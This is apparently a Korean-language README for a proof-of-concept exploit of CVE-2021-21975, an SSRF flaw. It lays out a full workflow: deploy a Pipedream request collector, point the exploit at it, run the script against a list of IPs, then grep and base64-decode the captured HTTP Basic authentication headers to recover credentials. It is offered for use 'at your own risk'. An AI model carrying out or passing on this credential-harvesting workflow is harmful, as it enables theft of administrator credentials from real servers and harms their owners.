
CVE-2021-21975(VMware vCenter Server SSRF)에 대한 개념 증명 익스플로잇으로, 서버 측 요청 위조(SSRF)를 활용해 HTTP 기본 인증을 통해 base64로 인코딩된 자격 증명을 유출합니다.
#SSRF-POC - ssrf에서 인증 정보 유출까지
#먼저 pd 클라이언트를 구성하세요.
#이제 ./pd deploy http-new-requests 를 실행하세요.
#이제 스크립트에서 pipedream http 요청(예: Randomstring.m.pipedream.net)을 교체하세요.
#이것을 별도의 터미널에서 실행하세요 - ./pd logs new-requests | tee -a req.txt
#그리고 이제 이것을 다른 터미널에서 실행하세요 - python3 CVE-2021-21975.py iplist
#cat req.txt | grep Basic > basic.txt; cat basic.txt | sort --unique > basic_uniq.txt ; base64 -d basic_uniq.txt
"이것은 취약점이 공개되었던 몇 달 전에 만들어진 초기 개념 증명입니다. 그러니 본인의 책임 하에 사용하세요." :V
#크레딧 @wabaf3t @D0rkerDevil